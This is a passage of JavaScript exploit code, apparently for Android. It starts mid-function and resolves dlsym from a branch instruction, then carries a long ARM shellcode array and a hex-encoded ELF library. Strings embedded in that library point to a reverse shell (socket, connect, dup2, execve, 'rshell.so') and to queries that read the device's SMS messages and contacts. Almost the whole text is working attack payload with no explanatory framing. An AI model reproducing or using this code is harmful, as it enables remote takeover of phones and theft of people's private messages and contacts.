var i10l = (val & 0x7fe0000) >> 17;
var off = ((s * 0xff) << 24) | (i1 << 23) | (i2 << 22) | (i10h << 12) | (i10l << 2);
return ((addr + 4) & ~3) + off;
}
var dlsym_addr = get_dest_from_blx(magic_position-4);
log("dlsym address is "+to_hex(dlsym_addr));
var so_str="";
var shellcode = [0xf0,0x4f,0x2d,0xe9,0x2d,0xb0,0xa0,0xe3,0xa8,0x1b,0xdf,0xed,0x4f,0xdf,0x4d,0xe2,0x60,0xa0,0xa0,0xe3,0xa7,0x0b,0xdf,0xed,0x67,0x80,0xa0,0xe3,0x20,0xe0,0xa0,0xe3,0x18,0x00,0x8d,0xe5,0x78,0x00,0xa0,0xe3,0x00,0x30,0xa0,0xe3,0xf4,0xb0,0xcd,0xe5,0x70,0xb0,0xa0,0xe3,0x6c,0x20,0xa0,0xe3,0x74,0xc0,0xa0,0xe3,0x6f,0x50,0xa0,0xe3,0xf2,0x80,0xcd,0xe5,0x69,0x40,0xa0,0xe3,0x65,0x60,0xa0,0xe3,0xf8,0x00,0xcd,0xe5,0x64,0x10,0xa0,0xe3,0x73,0x70,0xa0,0xe3,0xf9,0xb0,0xcd,0xe5,0x5f,0x80,0xa0,0xe3,0xff,0xa0,0xcd,0xe5,0x6d,0x00,0xa0,0xe3,0x02,0xa1,0xcd,0xe5,0x61,0xb0,0xa0,0xe3,0x79,0xa0,0xa0,0xe3,0x1a,0x1b,0xcd,0xed,0xf3,0xe0,0xcd,0xe5,0x72,0x90,0xa0,0xe3,0xf6,0xe0,0xcd,0xe5,0xfe,0xe0,0xcd,0xe5,0x03,0x31,0xcd,0xe5,0x5e,0x30,0xcd,0xe5,0xf0,0x20,0xcd,0xe5,0xfa,0x20,0xcd,0xe5,0xf1,0x50,0xcd,0xe5,0xfb,0x50,0xcd,0xe5,0xf5,0xc0,0xcd,0xe5,0xfd,0xc0,0xcd,0xe5,0x5b,0xc0,0xcd,0xe5,0xf7,0x60,0xcd,0xe5,0x5c,0x60,0xcd,0xe5,0xfc,0x40,0xcd,0xe5,0x00,0x41,0xcd,0xe5,0x01,0x11,0xcd,0xe5,0x0c,0x11,0xcd,0xe5,0x58,0x70,0xcd,0xe5,0x5a,0x70,0xcd,0xe5,0x59,0xa0,0xcd,0xe5,0x25,0xa0,0xa0,0xe3,0x5d,0x00,0xcd,0xe5,0x6e,0x00,0xa0,0xe3,0x08,0x81,0xcd,0xe5,0x09,0x81,0xcd,0xe5,0x0a,0xb1,0xcd,0xe5,0x2c,0xb0,0xa0,0xe3,0x11,0x81,0xcd,0xe5,0x15,0x81,0xcd,0xe5,0x70,0x80,0xa0,0xe3,0x0b,0x01,0xcd,0xe5,0x67,0x00,0xa0,0xe3,0x16,0x81,0xcd,0xe5,0x6d,0x80,0xa0,0xe3,0x0d,0x91,0xcd,0xe5,0x54,0x80,0xcd,0xe5,0x90,0x80,0xcd,0xe5,0x70,0x80,0xa0,0xe3,0x14,0x01,0xcd,0xe5,0x6e,0x00,0xa0,0xe3,0x0e,0x51,0xcd,0xe5,0x10,0x11,0xcd,0xe5,0x13,0x51,0xcd,0xe5,0x17,0x91,0xcd,0xe5,0x50,0x10,0xcd,0xe5,0x79,0x10,0xa0,0xe3,0x91,0x80,0xcd,0xe5,0x70,0x80,0x8d,0xe2,0x92,0x90,0xcd,0xe5,0xe0,0x90,0x8d,0xe2,0x93,0x50,0xcd,0xe5,0x6e,0x50,0xa0,0xe3,0x1b,0x31,0xcd,0xe5,0x55,0x30,0xcd,0xe5,0x98,0x30,0xcd,0xe5,0x0f,0x41,0xcd,0xe5,0x12,0x21,0xcd,0xe5,0x18,0x41,0xcd,0xe5,0x19,0x01,0xcd,0xe5,0x68,0x00,0x8d,0xe2,0x1a,0xc1,0xcd,0xe5,0x51,0x20,0xcd,0xe5,0x52,0x70,0xcd,0xe5,0x53,0x10,0xcd,0xe5,0x03,0x10,0xa0,0xe1,0x30,0x80,0x8d,0xe5,0x34,0x90,0x8d,0xe5,0x94,0xc0,0xcd,0xe5,0x95,0x60,0xcd,0xe5,0x97,0xc0,0xcd,0xe5,0x63,0xc0,0xa0,0xe3,0xe0,0x40,0xcd,0xe5,0x68,0x40,0xa0,0xe3,0xe1,0x50,0xcd,0xe5,0x1c,0x0b,0xcd,0xed,0xe3,0x70,0xcd,0xe5,0x18,0x70,0x9d,0xe5,0xe6,0x20,0xcd,0xe5,0xe7,0x20,0xcd,0xe5,0x78,0x20,0xa0,0xe3,0x96,0xc0,0xcd,0xe5,0xe2,0xe0,0xcd,0xe5,0x00,0x80,0x97,0xe5,0xe8,0xe0,0xcd,0xe5,0xea,0x20,0xcd,0xe5,0xed,0x20,0xcd,0xe5,0xee,0x30,0xcd,0xe5,0xe5,0x60,0xcd,0xe5,0x04,0x60,0x97,0xe5,0xe9,0xa0,0xcd,0xe5,0xec,0xa0,0xcd,0xe5,0xeb,0xb0,0xcd,0xe5,0xe4,0x40,0xcd,0xe5,0x38,0xff,0x2f,0xe1,0x50,0x10,0x8d,0xe2,0x36,0xff,0x2f,0xe1,0x10,0x00,0x8d,0xe5,0x42,0x1f,0x8d,0xe2,0x00,0x00,0xe0,0xe3,0x10,0xa0,0x9d,0xe5,0x3a,0xff,0x2f,0xe1,0x0c,0xb0,0x97,0xe5,0x2c,0x00,0x8d,0xe5,0xe0,0x20,0x8d,0xe2,0x08,0x30,0x97,0xe5,0x70,0x10,0x8d,0xe2,0x02,0x00,0xa0,0xe3,0x2c,0x90,0x9d,0xe5,0x00,0xb0,0x8d,0xe5,0x39,0xff,0x2f,0xe1,0x58,0x10,0x8d,0xe2,0x00,0x00,0xe0,0xe3,0x3a,0xff,0x2f,0xe1,0x00,0x30,0xa0,0xe1,0xf0,0x00,0x8d,0xe2,0x33,0xff,0x2f,0xe1,0x00,0x00,0xe0,0xe3,0x90,0x10,0x8d,0xe2,0x3a,0xff,0x2f,0xe1,0x00,0xc0,0xa0,0xe1,0x08,0x00,0x97,0xe5,0x01,0x00,0x70,0xe3,0x7d,0x01,0x00,0x0a,0x18,0xe0,0x9d,0xe5,0x01,0x5a,0x8e,0xe2,0xff,0x6e,0xc5,0xe3,0x07,0x20,0xa0,0xe3,0x0f,0xa0,0xc6,0xe3,0x0b,0x1a,0xa0,0xe3,0x01,0x0a,0x8a,0xe2,0x05,0x4a,0x85,0xe2,0x3c,0xff,0x2f,0xe1,0xbc,0xa2,0xd5,0xe1,0x1c,0x20,0x95,0xe5,0x00,0x00,0x5a,0xe3,0x02,0x20,0x85,0xe0,0x00,0xe0,0xa0,0x13,0x09,0x00,0x00,0x1a,0x1e,0x00,0x00,0xea,0x00,0xf0,0x20,0xe3,0x6c,0x69,0x62,0x63,0x2e,0x73,0x6f,0x00,0x65,0x78,0x70,0x6c,0x6f,0x69,0x74,0x00,0x01,0xe0,0x8e,0xe2,0x20,0x20,0x82,0xe2,0x0a,0x00,0x5e,0xe1,0x15,0x00,0x00,0x2a,0x00,0xb0,0x92,0xe5,0x01,0x00,0x5b,0xe3,0xf8,0xff,0xff,0x1a,0x10,0x90,0x92,0xe5,0x00,0x00,0x59,0xe3,0xf5,0xff,0xff,0x0a,0x00,0x30,0xa0,0xe3,0x04,0xc0,0x92,0xe5,0x03,0x70,0x85,0xe0,0x03,0x00,0x84,0xe0,0x08,0x10,0x92,0xe5,0x01,0x30,0x83,0xe2,0x0c,0x80,0xd7,0xe7,0x01,0x80,0xc0,0xe7,0x10,0x60,0x92,0xe5,0x06,0x00,0x53,0xe1,0xf5,0xff,0xff,0x3a,0xbc,0xa2,0xd5,0xe1,0x01,0xe0,0x8e,0xe2,0x20,0x20,0x82,0xe2,0x0a,0x00,0x5e,0xe1,0xe9,0xff,0xff,0x3a,0x5f,0xe0,0xa0,0xe3,0x64,0xc0,0xa0,0xe3,0x61,0xb0,0xa0,0xe3,0x72,0x60,0xa0,0xe3,0x00,0x90,0xa0,0xe3,0x74,0x70,0xa0,0xe3,0x20,0xe1,0xcd,0xe5,0x6e,0xa0,0xa0,0xe3,0x69,0x20,0xa0,0xe3,0x21,0xe1,0xcd,0xe5,0x6f,0x30,0xa0,0xe3,0x29,0xe1,0xcd,0xe5,0x12,0x8e,0x8d,0xe2,0x2d,0xe1,0xcd,0xe5,0x6c,0xe0,0xa0,0xe3,0x08,0x10,0xa0,0xe1,0x22,0xb1,0xcd,0xe5,0x67,0xb0,0xa0,0xe3,0x00,0x00,0xe0,0xe3,0x24,0xc1,0xcd,0xe5,0x28,0xc1,0xcd,0xe5,0x70,0xc0,0xa0,0xe3,0x23,0xa1,0xcd,0xe5,0x31,0xa1,0xcd,0xe5,0x25,0x61,0xcd,0xe5,0x2f,0x61,0xcd,0xe5,0x26,0x31,0xcd,0xe5,0x2b,0x31,0xcd,0xe5,0x10,0x30,0x9d,0xe5,0x27,0x21,0xcd,0xe5,0x30,0x21,0xcd,0xe5,0x2a,0xe1,0xcd,0xe5,0x2c,0xb1,0xcd,0xe5,0x63,0xb0,0xa0,0xe3,0x2e,0xc1,0xcd,0xe5,0x32,0x71,0xcd,0xe5,0x33,0x91,0xcd,0xe5,0x33,0xff,0x2f,0xe1,0x70,0x20,0xa0,0xe3,0x73,0xe0,0xa0,0xe3,0x0c,0x00,0x8d,0xe5,0x6d,0xc0,0xa0,0xe3,0x61,0x70,0xcd,0xe5,0x60,0x10,0x8d,0xe2,0x62,0x60,0xcd,0xe5,0x10,0x30,0x9d,0xe5,0x00,0x00,0xe0,0xe3,0x65,0x20,0xcd,0xe5,0x60,0xe0,0xcd,0xe5,0x63,0xb0,0xcd,0xe5,0x64,0xc0,0xcd,0xe5,0x66,0x90,0xcd,0xe5,0x33,0xff,0x2f,0xe1,0xb2,0xe3,0xd5,0xe1,0x25,0x20,0xa0,0xe3,0x08,0x10,0xa0,0xe1,0x20,0xc0,0x95,0xe5,0xa8,0x90,0xcd,0xe5,0x78,0x30,0xa0,0xe3,0xa0,0x20,0xcd,0xe5,0x00,0xb0,0xa0,0xe1,0x02,0x00,0xa0,0xe3,0xa3,0x20,0xcd,0xe5,0x0e,0x81,0x8e,0xe0,0xa6,0x20,0xcd,0xe5,0x2c,0xe0,0xa0,0xe3,0x0c,0x20,0x85,0xe0,0xa1,0x30,0xcd,0xe5,0x88,0xc1,0x8c,0xe0,0xa2,0xe0,0xcd,0xe5,0xa5,0xe0,0xcd,0xe5,0x05,0xc0,0x8c,0xe0,0x14,0x20,0x8d,0xe5,0xa0,0x20,0x8d,0xe2,0x10,0x80,0x9c,0xe5,0xa4,0x30,0xcd,0xe5,0xa7,0x30,0xcd,0xe5,0x05,0x30,0xa0,0xe1,0x00,0xc0,0x8d,0xe5,0x0c,0xc0,0x9d,0xe5,0x08,0xe0,0x85,0xe0,0x6d,0x80,0xa0,0xe3,0x04,0xe0,0x8d,0xe5,0x08,0xe0,0x8d,0xe5,0x3c,0xff,0x2f,0xe1,0x64,0xe0,0xa0,0xe3,0x73,0x00,0xa0,0xe3,0x86,0x80,0xcd,0xe5,0x2e,0x30,0xa0,0xe3,0x79,0x20,0xa0,0xe3,0x83,0xa0,0xcd,0xe5,0x65,0x10,0xa0,0xe3,0x81,0xe0,0xcd,0xe5,0x67,0xc0,0xa0,0xe3,0x84,0x00,0xcd,0xe5,0x70,0x80,0xa0,0xe3,0x89,0xe0,0xcd,0xe5,0x6f,0xe0,0xa0,0xe3,0x8c,0x00,0xcd,0xe5,0x6c,0x00,0xa0,0xe3,0x8b,0xa0,0xcd,0xe5,0x8d,0x70,0xcd,0xe5,0x8e,0x60,0xcd,0xe5,0x49,0xc0,0xcd,0xe5,0x5f,0xc0,0xa0,0xe3,0x4a,0xe0,0xcd,0xe5,0x64,0xe0,0xa0,0xe3,0x4b,0x70,0xcd,0xe5,0xad,0x60,0xcd,0xe5,0xaf,0x00,0xcd,0xe5,0xb1,0x80,0xcd,0xe5,0x69,0x80,0xa0,0xe3,0xb2,0x00,0xcd,0xe5,0xb3,0x70,0xcd,0xe5,0xb9,0x60,0xcd,0xe5,0x82,0x20,0xcd,0xe5,0x85,0x20,0xcd,0xe5,0x8a,0x20,0xcd,0xe5,0x87,0x90,0xcd,0xe5,0x8f,0x90,0xcd,0xe5,0x4c,0x90,0xcd,0xe5,0xb4,0x90,0xcd,0xe5,0x80,0x30,0xcd,0xe5,0x88,0x30,0xcd,0xe5,0x48,0x30,0xcd,0xe5,0xac,0x30,0xcd,0xe5,0xb0,0x30,0xcd,0xe5,0xb8,0x30,0xcd,0xe5,0xae,0x10,0xcd,0xe5,0xba,0x10,0xcd,0xe5,0xbb,0x00,0xcd,0xe5,0xb0,0x03,0xd5,0xe1,0xbe,0x20,0xcd,0xe5,0xbf,0xa0,0xcd,0xe5,0xc6,0xa0,0xcd,0xe5,0x61,0xa0,0xa0,0xe3,0xc8,0x70,0xcd,0xe5,0x09,0x00,0x50,0xe1,0xcb,0x60,0xcd,0xe5,0xcc,0x60,0xcd,0xe5,0xce,0x20,0xcd,0xe5,0x64,0x20,0xa0,0xe3,0xd3,0x70,0xcd,0xe5,0x6c,0x70,0xa0,0xe3,0xd6,0x60,0xcd,0xe5,0xda,0x60,0xcd,0xe5,0x6f,0x60,0xa0,0xe3,0xc9,0xc0,0xcd,0xe5,0x08,0xc0,0x9d,0xe5,0xbc,0x30,0xcd,0xe5,0xbd,0xe0,0xcd,0xe5,0xc0,0x90,0xcd,0xe5,0xc4,0x30,0xcd,0xe5,0xc5,0x80,0xcd,0xe5,0xc7,0x80,0xcd,0xe5,0xca,0xa0,0xcd,0xe5,0xcd,0xa0,0xcd,0xe5,0xcf,0x90,0xcd,0xe5,0xd0,0x30,0xcd,0xe5,0xd1,0x20,0xcd,0xe5,0xd2,0xa0,0xcd,0xe5,0xd4,0xa0,0xcd,0xe5,0xd5,0x30,0xcd,0xe5,0xd7,0x10,0xcd,0xe5,0xd8,0x70,0xcd,0xe5,0xd9,0x30,0xcd,0xe5,0xdb,0x60,0xcd,0xe5,0xdc,0x90,0xcd,0xe5,0xb1,0x00,0x00,0x0a,0x48,0x10,0x8d,0xe2,0xc4,0x60,0x8d,0xe2,0x14,0x70,0x9d,0xe5,0x80,0x20,0x8d,0xe2,0x88,0x30,0x8d,0xe2,0x14,0x90,0x8d,0xe5,0x24,0x90,0x8d,0xe5,0x09,0x80,0xa0,0xe1,0xac,0x00,0x8d,0xe2,0x0c,0x10,0x8d,0xe5,0xb8,0xe0,0x8d,0xe2,0xd0,0x10,0x8d,0xe2,0x38,0x60,0x8d,0xe5,0x03,0xa0,0xa0,0xe1,0x0c,0x60,0xa0,0xe1,0x3c,0x90,0x8d,0xe5,0x1c,0x90,0x8d,0xe5,0x02,0x90,0xa0,0xe1,0x20,0x00,0x8d,0xe5,0x28,0xe0,0x8d,0xe5,0x40,0x10,0x8d,0xe5,0x44,0x40,0x8d,0xe5,0x00,0x40,0x97,0xe5,0x09,0x10,0xa0,0xe1,0x04,0x40,0x86,0xe0,0x04,0x00,0xa0,0xe1,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x1c,0x70,0x8d,0x05,0x1e,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0x0a,0x10,0xa0,0xe1,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x24,0x70,0x8d,0x05,0x18,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0x48,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x13,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xac,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x14,0x70,0x8d,0x05,0x0d,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xb8,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x3c,0x70,0x8d,0x05,0x07,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xc4,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x02,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xd0,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0xb0,0xc3,0xd5,0xe1,0x01,0x80,0x88,0xe2,0x28,0x70,0x87,0xe2,0x0c,0x00,0x58,0xe1,0xd3,0xff,0xff,0xba,0x44,0x40,0x9d,0xe5,0x3c,0x90,0x9d,0xe5,0x1c,0xa0,0x9d,0xe5,0x14,0x20,0x9d,0xe5,0x24,0x80,0x9d,0xe5,0x14,0xe0,0x9d,0xe5,0x14,0xc0,0x92,0xe5,0x10,0x70,0x98,0xe5,0x10,0x30,0x9a,0xe5,0x10,0x60,0x9e,0xe5,0xac,0x21,0xb0,0xe1,0x07,0x70,0x85,0xe0,0x03,0x30,0x85,0xe0,0x06,0x60,0x85,0xe0,0x1b,0x00,0x00,0x0a,0x00,0x00,0xa0,0xe3,0x1c,0x90,0x8d,0xe5,0x14,0x80,0x9d,0xe5,0x00,0x90,0xa0,0xe1,0x14,0xa0,0x8d,0xe5,0x06,0xa0,0xa0,0xe1,0x03,0x60,0xa0,0xe1,0x0c,0x50,0x8d,0xe5,0x10,0x50,0x9d,0xe5,0x10,0xb0,0x8d,0xe5,0x04,0x10,0x9a,0xe5,0x00,0x00,0xe0,0xe3,0x01,0x90,0x89,0xe2,0x00,0xb0,0x9a,0xe5,0x08,0xa0,0x8a,0xe2,0x51,0x24,0xef,0xe7,0x02,0xe2,0x96,0xe7,0x0e,0x10,0x87,0xe0,0x35,0xff,0x2f,0xe1,0x0b,0x00,0x84,0xe7,0x14,0x10,0x98,0xe5,0xa1,0x01,0x59,0xe1,0xf2,0xff,0xff,0x3a,0x0c,0x50,0x9d,0xe5,0x06,0x30,0xa0,0xe1,0x10,0xb0,0x9d,0xe5,0x1c,0x90,0x9d,0xe5,0x14,0xa0,0x9d,0xe5,0x14,0x20,0x99,0xe5,0x10,0xc0,0x99,0xe5,0xa2,0x21,0xb0,0xe1,0x00,0x10,0xa0,0x13,0x0c,0xc0,0x85,0xe0,0x01,0x00,0xa0,0x11,0x0c,0x00,0x00,0x0a,0x01,0x20,0xa0,0xe1,0x01,0x00,0x80,0xe2,0x0c,0xe0,0xb2,0xe7,0x08,0x10,0x81,0xe2,0x04,0x20,0x92,0xe5,0x52,0x24,0xef,0xe7,0x02,0x22,0x83,0xe0,0x04,0x20,0x92,0xe5,0x04,0x20,0x82,0xe0,0x04,0x20,0x8e,0xe7,0x14,0xe0,0x99,0xe5,0xae,0x01,0x50,0xe1,0xf2,0xff,0xff,0x3a,0x14,0x00,0x9a,0xe5,0x37,0x0b,0x9f,0xed,0x20,0x22,0xb0,0xe1,0x1e,0x0b,0x8d,0xed,0x03,0x90,0xa0,0x11,0x00,0x80,0xa0,0x13,0x78,0x60,0x8d,0x12,0x04,0x00,0x00,0x1a,0x0d,0x00,0x00,0xea,0x14,0x10,0x9a,0xe5,0x10,0x90,0x89,0xe2,0x21,0x02,0x58,0xe1,0x09,0x00,0x00,0x2a,0x00,0x30,0x99,0xe5,0x06,0x10,0xa0,0xe1,0x01,0x80,0x88,0xe2,0x03,0x00,0x87,0xe0,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0xf4,0xff,0xff,0x1a,0x04,0x70,0x99,0xe5,0x07,0x60,0x84,0xe0,0x01,0x00,0x00,0xea,0xcc,0x6c,0x0c,0xe3,0x16,0x68,0xdf,0xe7,0x05,0x30,0xa0,0xe1,0x00,0x40,0x8d,0xe5,0x70,0x10,0x8d,0xe2,0xe0,0x20,0x8d,0xe2,0x2c,0x40,0x9d,0xe5,0x02,0x00,0xa0,0xe3,0x34,0xff,0x2f,0xe1,0x18,0x50,0x9d,0xe5,0x08,0x00,0x85,0xe2,0x36,0xff,0x2f,0xe1,0x4f,0xdf,0x8d,0xe2,0xf0,0x8f,0xbd,0xe8,0x54,0x10,0x9f,0xe5,0x7f,0x45,0x04,0xe3,0x4c,0x46,0x44,0xe3,0x01,0x50,0x8f,0xe0,0x04,0x50,0x85,0xe2,0x04,0x70,0x15,0xe5,0xfa,0x0e,0x57,0xe3,0xfb,0xff,0xff,0x1a,0x00,0x80,0x95,0xe5,0x04,0x00,0x58,0xe1,0xf8,0xff,0xff,0x1a,0x77,0xfe,0xff,0xea,0x00,0x90,0xa0,0xe1,0x14,0x00,0x8d,0xe5,0x00,0xa0,0xa0,0xe1,0x24,0x00,0x8d,0xe5,0x00,0x20,0xa0,0xe1,0x00,0x80,0xa0,0xe1,0x00,0xe0,0xa0,0xe1,0x8d,0xff,0xff,0xea,0x00,0xf0,0x20,0xe3,0x73,0x6f,0x5f,0x6d,0x61,0x69,0x6e,0x00,0x88,0xf7,0xff,0xff,0x00,0xf0,0x20,0xe3,];
var so_str = "7f454c4601010100000000000000000003002800010000000000000034000000442100000000000534002000080028001600150006000000340000003400000034000000000100000001000004000000040000000300000034010000340100003401000013000000130000000400000001000000010000000000000000000000000000000112000001120000050000000010000001000000881e0000882e0000882e00007c010000800100000600000000100000020000008c1e00008c2e00008c2e00002801000028010000060000000400000051e574640000000000000000000000000000000000000000060000000000000001000070c40d0000c40d0000c40d00005800000058000000040000000400000052e57464881e0000882e0000882e0000780100007801000006000000040000002f73797374656d2f62696e2f6c696e6b657200000000000000000000000000000000000001000000000000000000000012000000100000000000000000000000120000001d000000000000000000000012000000340000000000000000000000120000004b00000000000000000000001200000073000000000000000000000012000000870000000000000000000000120000008e00000000000000000000001200000097000000150c00005c010000120008009f000000000000000000000012000000a4000000000000000000000012000000ab000000000000000000000012000000b5000000000000000000000012000000bc000000000000000000000012000000c4000000000000000000000012000000c9000000000000000000000012000000d0000000000000000000000012000000d7000000000000000000000012000000dc000000000000000000000012000000e100000004300000000000001000f1ffe800000004300000000000001000f1fff400000008300000000000001000f1ff005f5f6378615f66696e616c697a65005f5f6378615f617465786974005f5f61656162695f756e77696e645f6370705f707231005f5f61656162695f756e77696e645f6370705f707230005f5a4e37616e64726f69643134416e64726f696452756e74696d65396765744a4e49456e764576005f5f616e64726f69645f6c6f675f7072696e74006d616c6c6f6300736e7072696e746600736f5f6d61696e00666f726b0073797374656d00696e65745f6164647200736f636b657400636f6e6e6563740064757032006d656d7365740065786563766500667265650065786974005f6564617461005f5f6273735f7374617274005f656e64006c6962632e736f006c69626d2e736f006c6962737464632b2b2e736f006c69626d656469616e646b2e736f006c69627574696c732e736f006c696262696e6465722e736f006c69626d656469612e736f006c696273746167656672696768742e736f006c696273746167656672696768745f666f756e646174696f6e2e736f006c6962637574696c732e736f006c6962696e7075742e736f006c6962646c2e736f006c6962616e64726f69645f72756e74696d652e736f00727368656c6c2e736f0000110000001700000011000000140000000d000000000000000c000000050000000f000000000000000e0000000000000007000000150000001200000016000000020000000b00000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000300000008000000090000000a000000060000000000000000000000000000000000000010000000040000000000000013000000882e0000170000000030000017000000c02f000016010000c42f000016020000c82f000016050000cc2f000016060000d02f000016070000d42f000016080000d82f0000160a0000dc2f0000160b0000e02f0000160c0000e42f0000160d0000e82f0000160e0000ec2f0000160f0000f02f000016100000f42f000016110000f82f000016120000fc2f00001613000004e02de504e09fe50ee08fe008f0bee5f829000000c68fe202ca8ce2f8f9bce500c68fe202ca8ce2f0f9bce500c68fe202ca8ce2e8f9bce500c68fe202ca8ce2e0f9bce500c68fe202ca8ce2d8f9bce500c68fe202ca8ce2d0f9bce500c68fe202ca8ce2c8f9bce500c68fe202ca8ce2c0f9bce500c68fe202ca8ce2b8f9bce500c68fe202ca8ce2b0f9bce500c68fe202ca8ce2a8f9bce500c68fe202ca8ce2a0f9bce500c68fe202ca8ce298f9bce500c68fe202ca8ce290f9bce500c68fe202ca8ce288f9bce500c68fe202ca8ce280f9bce500482de904b08de20c309fe503308fe00300a0e1c9ffffeb0088bde86c29000000482de904b08de208d04de208000be508301be5000053e30100000a08301be533ff2fe104d04be20088bde800482de904b08de208d04de208000be528309fe503308fe00300a0e108101be51c309fe503308fe00320a0e1b3ffffeb0030a0e10300a0e104d04be20088bde8b8ffffff0829000008b503689a69904708bd10b50468d4f88440a04710bd0cb413b504ab046853f8042bd4f88c400193a04702b0bde8104002b070470cb413b504ab046853f8042bd4f898400193a04702b0bde8104002b070470cb413b504ab046853f8042bd4f8c8400193a04702b0bde8104002b070470cb413b504ab046853f8042bd4f8d4400193a04702b0bde8104002b070470cb413b504ab046853f8042bd4f8e0400193a04702b0bde8104002b070470cb413b504ab046853f8042bd4f8cc410193a04702b0bde8104002b0704700002de9f04f0746dff878a395b0fa44daf80030581ccaf80000fff7eeeed94904467944fff787ff216805462046d64ad74bd1f8c46129467a447b44b047024629462046fff7cdffd24981460620d14a4b4679447a44fff7d6eecf4920467944fff769ff226883462046cc4b5946d2f8c4c1cb4a7b447a44e0472368804639462046d3f89c52a84703464246c64d59462046fff7a6ffc449074620464ff0000b7d447944fff747ffc14a01462046c04b7a447b44fff744ff024649462046fff745ffbc49064620467944fff734ffba4a01462046ba4b7a447b44fff731ff02463b46cdf800b03146cdf804b02046cdf808b0b34fcdf80cb0fff728ffb249064620467f447944fff716ffaf4a80462b46414620467a44fff713ffac4a2b468146414620467a44fff70bffa94a08904146a94b20467a447b44fff702ffa74a3b460990414620467a44fff7fafea44a0a904146a34b20467a447b44fff7f1fea14a0b904146a14b20467a447b44fff7e8fe9f4a0c9041469e4b20467a447b44fff7dffe9c4a0d9041469c4b20467a447b44fff7d6fe9a4a3b460e90414620467a44fff7cefe974a41460f90964b20467a447b44fff7c5fe4ff40010fff72aee924a4ff400110746daf800307a44fff728ee0546314620464a46fff7c7fe002800f0c4808a48cdf814b08a497844794412901391c5f500117819129a059b4ff0000afff70eee059a3146804605442046531c099a0593fff7b8fe7f49079006207e4a079b79447a44fff7eeed7c487d497844794410901191079a924580f28e80baf1000f05ddb5f5001f02da2c237b55013531460a9a53462046fff778fe0690206800220699d0f8a43220469847814631460b9a069b2046fff787fe83460c9a20465b463146fff780fe04285bd8dfe800f0521803294d0031460d9a5b462046fff791fe07ee900a5f4a7819c5f500114b467a44f7eee70acded000bfff7b0ed40e00e9a5b4620463146fff76dfe574acde900014b467819c5f500117a44fff7a0ed2fe031460f9a5b462046fff72ffe2168844600222046d1f8a4326146cdf810c0984783460090c5f50011119a4b467819fff786ed226880462046ddf810c0d2f8a8325a46614698470ce07819c5f50011109a03e0139a7819c5f500114b46fff76eed804620684a46454406990af1010ad0f8a832204698476de720463146089afff703fe00287ff444af30492b460620304a79447a44fff746ed384615b0bde8f08f14280000180600001d0600002e060000320600003806000041060000410600003906000052070000390600004a0600005b060000690600007b0600007f06000020070000ca060000d2060000d2060000cd060000da060000ce060000e2060000ef060000f5060000fb060000f0060000f7060000ec060000f2060000e7060000e1060000e5060000cf060000bb060000f1060000620400008a060000a70600009f06000011060000ed05000012030000710500002de9f0410546474c8cb00620464a7c4421467a44fff7dcec444a21462b4606207a44fff7d6ec6b6921460620404a00932b697a44fff7ccec3e487844fff7c6fd07463d487844fff7c1fd0646fff7d2ec431c06d1394a214606207a44fff7b8ec00e050b136487844fff7caec35487844fff7c6ec0cb0bde8f081334d40f62c102146324a4ff00208009006207d442b467a44fff79eec42f609412846adf81080adf81210fff7b2ec0590012106224046fff7b2ec04a910220546fff7b4ec28b9234a062021467a44fff782ecdff8848028460021fff7acec28460121fff7a8ec002428460221f84408adfff7a2ec21461022cdf8088028460394fff7a0ec164a02a9404609970a967a4408922a46fff79cec3846fff79eec3046fff79cec2046fff79eec40020000a8040000ab040000b4040000c4040000c8040000da040000da040000f304000000050000e8040000d3040000c8040000b504000008b10181b0b000840000000003b10181b00cb1a80000000003b10181b00cb1a80000000003b10181b00cb1a80000000003b10181b00cb1a80000000003b10181b00cb1a80000000003b10181b00cb1a80000000050f9ff7fa8ffff7f52f9ff7fb0b0a88056f9ff7fa4ffff7f6cf9ff7fa8ffff7f82f9ff7facffff7f98f9ff7fb0ffff7faef9ff7fb4ffff7fc4f9ff7fb8ffff7fdcf9ff7fb0af148008feff7fb0ac0b805cffff7f01000000616e64726f69642f6170702f41637469766974795468726561640063757272656e744170706c69636174696f6e0028294c616e64726f69642f6170702f4170706c69636174696f6e3b006578706c6f6974006170706c69636174696f6e2069732025700a00616e64726f69642f6e65742f55726900706172736500284c6a6176612f6c616e672f537472696e673b294c616e64726f69642f6e65742f5572693b00616e64726f69642f636f6e74656e742f436f6e746578745772617070657200676574436f6e74656e745265736f6c7665720028294c616e64726f69642f636f6e74656e742f436f6e74656e745265736f6c7665723b00616e64726f69642f636f6e74656e742f436f6e74656e745265736f6c76657200717565727900284c616e64726f69642f6e65742f5572693b5b4c6a6176612f6c616e672f537472696e673b4c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f537472696e673b4c6a6176612f6c616e672f537472696e673b294c616e64726f69642f64617461626173652f437572736f723b00616e64726f69642f64617461626173652f437572736f72006d6f7665546f46697273740028295a006d6f7665546f4e65787400676574436f6c756d6e436f756e740028294900676574436f6c756d6e4e616d65002849294c6a6176612f6c616e672f537472696e673b00676574436f6c756d6e496e64657800284c6a6176612f6c616e672f537472696e673b29490067657454797065002849294900676574466c6f61740028492946006765744c6f6e67002849294a00676574537472696e6700636c6f7365002829560070726f766964657225643d000a726f772025643a00636f6c756d6e436f756e742069732025640a0025733d25660025733d256c6c640025733d25730025733d424c4f420025733d4e554c4c006c656e2069732025640a00656e7465722073656e646970632e736f006172726179206275666665722061646472657373206174202570006e632066696c652061742025702c6c656e20697320256400636f6e74656e743a2f2f736d7300636f6e74656e743a2f2f636f6d2e616e64726f69642e636f6e74616374732f636f6e746163747300666f726b206661696c65640